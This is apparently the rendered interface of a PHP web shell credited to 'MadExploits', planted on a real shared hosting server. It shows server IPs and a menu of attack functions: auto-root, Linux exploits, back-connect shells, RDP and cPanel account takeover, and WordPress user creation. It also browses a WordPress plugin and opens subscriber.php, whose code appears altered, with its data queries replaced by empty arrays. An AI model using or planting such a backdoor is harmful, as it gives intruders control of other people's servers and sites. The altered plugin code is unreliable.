Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.227.228.238
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
besthealthsdeals.com /
wp-content /
plugins /
coming-soon /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
backwards
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
admin-bar-menu.php
3.95
KB
-rw-r--r--
bootstrap.php
20.46
KB
-rw-r--r--
class-seedprod-notifications.p...
9.63
KB
-rw-r--r--
class-seedprod-review.php
5.97
KB
-rw-r--r--
cpt.php
541
B
-rw-r--r--
edit_with_seedprod.php
21.61
KB
-rw-r--r--
functions-addons.php
17.51
KB
-rw-r--r--
functions-envira-gallaries.php
799
B
-rw-r--r--
functions-inline-help.php
5.3
KB
-rw-r--r--
functions-openai.php
16.53
KB
-rw-r--r--
functions-rafflepress.php
1.86
KB
-rw-r--r--
functions-seedprod-gallery.php
7
B
-rw-r--r--
functions-utils.php
258.71
KB
-rw-r--r--
functions-wpforms.php
1.6
KB
-rw-r--r--
import-cross-site-functions.ph...
3.2
KB
-rw-r--r--
license.php
5.43
KB
-rw-r--r--
load_controller.php
1.69
KB
-rw-r--r--
lpage.php
34.91
KB
-rw-r--r--
nestednavmenu.php
5.09
KB
-rw-r--r--
render-csp-mm.php
9.8
KB
-rw-r--r--
render-dynamic-tags.php
26.24
KB
-rw-r--r--
render-lp.php
1.15
KB
-rw-r--r--
routes.php
24.62
KB
-rw-r--r--
settings.php
4.9
KB
-rw-r--r--
setup-wizard.php
12.08
KB
-rw-r--r--
subscriber.php
2.63
KB
-rw-r--r--
theme-templates.php
39.34
KB
-rw-r--r--
wp-cli-functions.php
22.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subscriber.php
<?php /** * Backend funtions for Subscribers functionality. */ /** * Get Datatable Info for the Subscribers page. * * @return JSON object. */ function seedprod_lite_subscribers_datatable() { if ( check_ajax_referer( 'seedprod_nonce' ) ) { if ( ! current_user_can( apply_filters( 'seedprod_subscriber_capability', 'list_users' ) ) ) { wp_send_json_error(); } $data = array( '' ); $current_page = 1; if ( ! empty( absint( $_GET['current_page'] ) ) ) { $current_page = absint( $_GET['current_page'] ); } $per_page = 100; $filter = null; if ( ! empty( $_GET['filter'] ) ) { $filter = sanitize_text_field( wp_unslash( $_GET['filter'] ) ); if ( 'all' === $filter ) { $filter = null; } } if ( ! empty( $_GET['s'] ) ) { $filter = null; } $results = array(); $data = array(); foreach ( $results as $v ) { // Format created timestamp to site timezone & format. $created_at = get_date_from_gmt( gmdate( 'Y-m-d H:i:s', $v->created_timestamp ), get_option( 'date_format' ) . ' ' . get_option( 'time_format' ) ); // Load Data $data[] = array( 'id' => $v->id, 'email' => $v->email, 'name' => $v->fname . ' ' . $v->lname, 'created_at' => $created_at, 'page_uuid' => $v->page_uuid, ); } $totalitems = 0; $views = array(); // Get recent subscriber data $chart_timeframe = 7; if ( ! empty( $_GET['interval'] ) ) { $chart_timeframe = absint( $_GET['interval'] ); } $recent_subscribers = array(); $now = new \DateTime( "$chart_timeframe days ago", new \DateTimeZone( 'America/New_York' ) ); $interval = new \DateInterval( 'P1D' ); // 1 Day interval $period = new \DatePeriod( $now, $interval, $chart_timeframe ); // 7 Days $recent_subscribers_data = array( array( __( 'Year', 'coming-soon' ), __( 'Subscribers', 'coming-soon' ) ), ); foreach ( $period as $day ) { $key = $day->format( 'Y-m-d' ); $display_key = $day->format( 'M j' ); $no_val = true; foreach ( $recent_subscribers as $v ) { if ( $key == $v->created ) { $recent_subscribers_data[] = array( $display_key, absint( $v->count ) ); $no_val = false; } } if ( $no_val ) { $recent_subscribers_data[] = array( $display_key, 0 ); } } $response = array( 'recent_subscribers' => $recent_subscribers_data, 'rows' => $data, 'lpage_name' => '', 'totalitems' => $totalitems, 'totalpages' => ceil( $totalitems / $per_page ), 'currentpage' => $current_page, 'views' => $views, ); wp_send_json( $response ); } }
Close